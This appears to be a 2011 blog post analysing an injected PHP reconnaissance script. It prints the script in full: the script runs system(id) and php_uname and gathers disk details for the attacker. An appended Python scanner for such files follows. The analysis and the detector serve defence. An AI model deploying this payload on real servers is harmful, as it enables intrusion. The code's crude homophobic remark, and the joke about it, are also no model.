
Wednesday, 26 October 2011

Dissecting Sample No - 1

This sample returns its output immediately once the following code is injected. If this code is saved
in a file on your system, then your system is being used to collect this information from other
systems. Explanations follow:

function ConvertBytes($number) {
    $len = strlen($number);
    if($len < 4) {
        return sprintf("%d b", $number);
    }
    if($len >= 4 && $len <=6) {
        return sprintf("%0.2f Kb", $number/1024);
    }
    if($len >= 7 && $len <=9) {
        return sprintf("%0.2f Mb", $number/1024/1024);
    }
    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

echo "Osirys";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here and also is a fucking gay..";
echo "uname -a: $un";
echo "os: $os";
echo "id: $id1";
echo "free: $free";
echo "used: $used";
echo "total: $all";
exit;

This attacker goes by the nickname Osirys and announces his own sexual preference within his
code. This might be a simple typo by a non-native English speaker trying to type "Guy" :-))

1- A test file may or may not have been used before this code.
2- The above code is injected and executed remotely on your system.
3- The code returns your system info to the attacker, including your total, free and used disk space.

This one is rather innocent in comparison to the one in our first dissection. Still, it is not
respectable at all.
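A defender-side check for files like the one dissected above, added here as an example and not part of the original post or of the attacker's code: it flags a file when several of the host-fingerprinting calls from the sample appear together. The indicator set, the threshold of 4 and all function names are assumptions chosen for illustration.

```python
import os
import re

# Host-fingerprinting calls seen in the sample above (indicator set is an assumption).
INDICATORS = {
    "php_uname": re.compile(r"\bphp_uname\s*\("),
    "id_command": re.compile(
        r"\b(?:system|exec|passthru|shell_exec)\s*\(\s*['\"]?id['\"]?\s*\)"),
    "getcwd": re.compile(r"\bgetcwd\s*\("),
    "disk_free": re.compile(r"\b(?:diskfreespace|disk_free_space)\s*\("),
    "disk_total": re.compile(r"\bdisk_total_space\s*\("),
    "php_os": re.compile(r"\bPHP_OS\b"),
}
THRESHOLD = 4  # assumed: distinct indicators needed before a file is flagged

def score_source(text):
    """Map each indicator found in text to the line numbers where it occurs."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def is_suspicious(text):
    """True when enough distinct indicators co-occur in one file."""
    return len(score_source(text)) >= THRESHOLD

def scan_tree(root, max_bytes=1_000_000):
    """Yield (path, hits) for every file under root that reaches THRESHOLD."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = score_source(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if len(hits) >= THRESHOLD:
                yield path, hits

# Constructed inputs: the calls from the sample, and an ordinary disk-usage page.
SAMPLE_RECON = "$un = @php_uname();\n$id1 = system(id);\n$pwd1 = @getcwd();\n" \
               "$free1= diskfreespace($pwd1);\n$all1= disk_total_space($pwd1);\n$os = @PHP_OS;\n"
SAMPLE_BENIGN = "$free = disk_free_space('/var/www');\n" \
                "$total = disk_total_space('/var/www');\n"
```

Calling `scan_tree()` on a web root or upload directory returns each flagged path with the line numbers of its hits, so the file can be reviewed by hand; a legitimate admin page that only reports disk usage stays below the threshold.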
